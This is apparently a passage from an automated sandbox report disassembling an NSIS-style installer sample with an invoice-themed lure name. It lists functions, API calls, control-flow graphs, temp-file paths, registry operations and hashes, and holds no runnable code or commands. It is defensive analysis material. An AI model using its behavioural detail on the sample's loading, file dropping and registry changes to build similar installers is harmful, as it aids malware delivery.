                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: File$ByteCharMultiPointerWide$Read
                                • String ID: 9
                                • API String ID: 1439708474-2366072709
                                • Opcode ID: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                • Instruction ID: 06df5d1e4fd17f9c1e4dafe2560c0fdc737aa95be89056b4b35a237a27527231
                                • Opcode Fuzzy Hash: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                • Instruction Fuzzy Hash: 305139B1618341AFD724DF11CA44A2BB7E8BFD5304F00483FF985A62D0DBB9D9458B6A
                                Function 00406179 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1044 406179-406199 GetSystemDirectoryW 1045 4061b3 1044->1045 1046 40619b-40619d 1044->1046 1048 4061b5 1045->1048 1046->1045 1047 40619f-4061aa 1046->1047 1047->1048 1049 4061ac-4061b1 1047->1049 1050 4061ba-4061e7 wsprintfW LoadLibraryExW 1048->1050 1049->1050
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                • wsprintfW.USER32 ref: 004061CC
                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%S.dll$UXTHEME$\
                                • API String ID: 2200240437-1946221925
                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction ID: b03dfa9df8f17b5f94e80c11c2028c51dcc2a5658fc7e28beebe443f54a48520
                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction Fuzzy Hash: 07F0BB7150161457D710BB64DE0DB96366CEB00304F54447AA646F62C1EB7C9A54CB9C
                                Function 00406A31 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1051 406a31-406a3d 1052 406a3e-406a70 GetTickCount GetTempFileNameW 1051->1052 1053 406a72-406a74 1052->1053 1054 406a7b 1052->1054 1053->1052 1055 406a76-406a79 1053->1055 1056 406a7d-406a80 1054->1056 1055->1056
                                APIs
                                • GetTickCount.KERNEL32 ref: 00406A4D
                                • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CAF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406A68
                                Strings
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3A
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A36
                                • a, xrefs: 00406A46
                                • n, xrefs: 00406A3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                • API String ID: 1716503409-1137806429
                                • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction ID: b372954d90286b94022032574b0bf3fdd655f2b9327b001c14c93946e7bfd4ef
                                • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction Fuzzy Hash: 1CF0BE72300208BBEB109F44DC09BDE7779EF81710F11C03BE941BB180E6B05A5487A4
                                Function 00403148 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1057 403148-403181 1058 403190-4031a4 call 406923 1057->1058 1059 403183-40318b call 403131 1057->1059 1063 403354 1058->1063 1064 4031aa-4031b0 1058->1064 1059->1058 1065 403356 1063->1065 1066 4032f6-4032f8 1064->1066 1067 4031b6-4031dd GetTickCount call 407c4f 1064->1067 1068 403357-403361 1065->1068 1069 4032fa-4032fc 1066->1069 1070 40333d-403352 call 40311b 1066->1070 1073 4032ee-4032f0 1067->1073 1078 4031e3-4031fa call 40311b 1067->1078 1069->1073 1074 4032fe 1069->1074 1070->1063 1070->1073 1073->1068 1077 403303-403313 call 40311b 1074->1077 1077->1063 1084 403315-403325 call 4069e6 1077->1084 1078->1063 1083 403200-40320e 1078->1083 1085 403218-403234 call 406e83 1083->1085 1089 403327-403335 1084->1089 1090 403339-40333b 1084->1090 1093 4032f2-4032f4 1085->1093 1094 40323a-40325a GetTickCount 1085->1094 1089->1077 1092 403337 1089->1092 1090->1065 1092->1073 1093->1065 1095 4032a7-4032ad 1094->1095 1096 40325c-403265 1094->1096 1099 4032e6-4032e8 1095->1099 1100 4032af-4032b1 1095->1100 1097 403267-403269 1096->1097 1098 40326b-4032a3 MulDiv wsprintfW call 405d15 1096->1098 1097->1095 1097->1098 1098->1095 1099->1073 1099->1078 1102 4032b3-4032bc call 4069e6 1100->1102 1103 4032cb-4032d3 1100->1103 1108 4032c1-4032c3 1102->1108 1104 4032d7-4032de 1103->1104 1104->1085 1107 4032e4 1104->1107 1107->1073 1108->1090 1109 4032c5-4032c9 1108->1109 1109->1104
                                APIs
                                • GetTickCount.KERNEL32 ref: 004031B6
                                • GetTickCount.KERNEL32 ref: 00403245
                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                                • wsprintfW.USER32 ref: 00403286
                                  • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CountTick$FilePointerwsprintf
                                • String ID: ... %d%%
                                • API String ID: 999035486-2449383134
                                • Opcode ID: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                • Instruction ID: b14d6756c9ad048cc293c005f1ed80a68e2f1ec6eb458bfd39e289cb7134058b
                                • Opcode Fuzzy Hash: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                • Instruction Fuzzy Hash: CB516E716083429BD710AF269A85A2B7BD9AB84345F044A3FFC55E32D1DB38DA048B5E
                                Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1110 40141e-401456 call 4062b3 1112 40145b-40145d 1110->1112 1113 401463-40146d 1112->1113 1114 401527-401530 1112->1114 1115 401493-4014a4 1113->1115 1116 40146f-401491 RegEnumValueW 1113->1116 1118 4014ce-4014d6 RegEnumKeyW 1115->1118 1116->1115 1117 401503-401512 RegCloseKey 1116->1117 1117->1114 1119 4014a6-4014a8 1118->1119 1120 4014d8-4014eb RegCloseKey call 4068c1 1118->1120 1119->1117 1122 4014aa-4014c1 call 40141e 1119->1122 1125 401514-40151e 1120->1125 1126 4014ed-401501 RegDeleteKeyW 1120->1126 1122->1120 1128 4014c3-4014cd 1122->1128 1125->1114 1126->1114 1128->1118
                                APIs
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                • RegCloseKey.ADVAPI32(?), ref: 00401507
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                • Opcode ID: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                • Instruction ID: 4f1e1c459a9a950a7738efb8d65c2f41013d72b2fa1f43b4319387a01f4f2cce
                                • Opcode Fuzzy Hash: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                • Instruction Fuzzy Hash: FD216032108244BBD7219F51DD08FABBBADFF99354F01043EF989A11B0D7359A149A6A
                                Function 0040225D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1129 40225d-402268 1130 40233e-402343 1129->1130 1131 40226e-402289 call 40303e * 2 1129->1131 1132 402345-40234a call 405d15 1130->1132 1141 40228b-402296 GetModuleHandleW 1131->1141 1142 40229c-4022aa LoadLibraryExW 1131->1142 1138 402ea5-402eb7 1132->1138 1144 4022b0-4022c2 call 406244 1141->1144 1145 402298 1141->1145 1142->1144 1146 402335-40233c 1142->1146 1149 4022c4-4022ca 1144->1149 1150 402306-40230c call 405d15 1144->1150 1145->1142 1146->1132 1151 4022e6-402304 1149->1151 1152 4022cc-4022e0 call 405d15 1149->1152 1155 402311-402315 1150->1155 1151->1155 1152->1155 1162 4022e2-4022e4 1152->1162 1155->1138 1158 40231b-402323 call 403cb1 1155->1158 1158->1138 1163 402329-402330 FreeLibrary 1158->1163 1162->1155 1163->1138
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432,00001013,00000000,00000000), ref: 00405DDB
                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                • String ID: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 334405425-2928134256
                                • Opcode ID: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                • Instruction ID: a1346d69ca964d54404f15d64018e456dfdc0067b09238f3cf27b8b50b8900a8
                                • Opcode Fuzzy Hash: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                • Instruction Fuzzy Hash: 6021F832648301A7C711AF619E49A3F76A4AFD8721F60013FF951B12D0DBBC98029A5F
                                Function 00402656 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscDCA5.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp,?,?,00000011,00000002), ref: 00402710
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp,?,?,00000011,00000002), ref: 0040271D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CloseValuelstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp
                                • API String ID: 2655323295-492680522
                                • Opcode ID: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                • Instruction ID: 31e5bc54edfcad7c1b31027c56fe611cf8d7432ac604a3e5fe606c4c5445a84e
                                • Opcode Fuzzy Hash: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                • Instruction Fuzzy Hash: 0F210032604300ABD7119FA0CD45A2FBBE8EB88760F10083EF540F31C0C7B99905879A
                                Function 004068C1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                • GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                  • Part of subcall function 00406179: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                  • Part of subcall function 00406179: wsprintfW.USER32 ref: 004061CC
                                  • Part of subcall function 00406179: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                • API String ID: 2547128583-890815371
                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction ID: 8df058e233f66e35bffb69da01c296363a0ab298929cdf7fbd230430fe9e2c9f
                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction Fuzzy Hash: BAD05B371022159BC7012F62AE0895F776DEF56351705443AF541F7270DB38D82295FD
                                Function 00405E19 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E5A
                                • GetLastError.KERNEL32 ref: 00405E64
                                • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405E7D
                                • GetLastError.KERNEL32 ref: 00405E8B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID:
                                • API String ID: 3449924974-0
                                • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                • Instruction ID: 2395f8a8d7837bad9ab877b1c5b4dd478f8f3e4f7c6de220d66e2a00ae86bb09
                                • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                • Instruction Fuzzy Hash: A201EC75D00609DFDB109FA0DA44BAE7BB4EF14315F10453AD989F2190D7789648CF99
                                Function 00406952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405F99), ref: 00406999
                                • RegCloseKey.KERNELBASE(?), ref: 004069A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Call
                                • API String ID: 3356406503-1824292864
                                • Opcode ID: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                • Instruction ID: 602e610a5625c9c57cce2cfaa1a97c2955b97914b1987e410d3f2042aedcb8ce
                                • Opcode Fuzzy Hash: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                • Instruction Fuzzy Hash: 65015EB652010ABADF218FA4DD06EEF7BE8EF44754F11013AF801E22A0D374DA64DB94
                                Function 00406613 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Tolkningen Setup,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406BA0: CharNextW.USER32(?,?,?,00000000,00425A48,0040662A,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406BAF
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BB4
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BCE
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
